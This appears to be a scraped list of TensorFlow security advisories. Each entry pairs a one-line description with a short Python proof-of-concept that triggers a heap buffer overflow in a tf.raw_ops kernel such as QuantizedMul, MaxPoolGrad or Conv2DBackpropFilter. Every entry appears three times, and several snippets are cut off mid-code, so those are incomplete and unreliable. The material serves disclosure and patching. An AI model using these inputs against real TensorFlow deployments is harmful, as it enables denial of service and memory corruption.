An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)